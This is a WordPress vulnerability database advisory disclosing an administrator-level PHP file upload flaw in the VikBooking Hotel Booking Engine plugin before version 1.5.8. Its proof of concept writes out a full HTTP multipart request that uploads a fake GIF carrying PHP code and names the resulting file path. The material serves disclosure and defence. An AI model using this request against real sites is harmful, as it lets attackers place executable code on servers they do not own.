WordPress Plugin Vulnerabilities
VikBooking Hotel Booking Engine & PMS < 1.5.8 - Admin+ PHP File Upload
Description
The plugin does not properly validate images, allowing high privilege users such as administrators to upload PHP files disguised as images and containing malicious PHP code
Proof of Concept
Edit/add a Characteristics (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as a Characteristic Image: POST /wp-admin/admin.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959 Content-Length: 1469 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="caratname" WiFi -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php" Content-Type: image/gif GIF89a; <?php phpinfo() ?> -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="resizeto" 250 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="carattextimg" <i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i> -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="ordering" 1 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="task" updatecarat -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="whereup" 1 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="option" com_vikbooking -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="vikwp_nonce" 2817d7732a -----------------------------119541905442224294322517652959-- PHP file will be at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Gabriel3476
Submitter
Gabriel3476
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-04-21 (about 2 years ago)
Added
2022-04-21 (about 2 years ago)
Last Updated
2022-04-22 (about 2 years ago)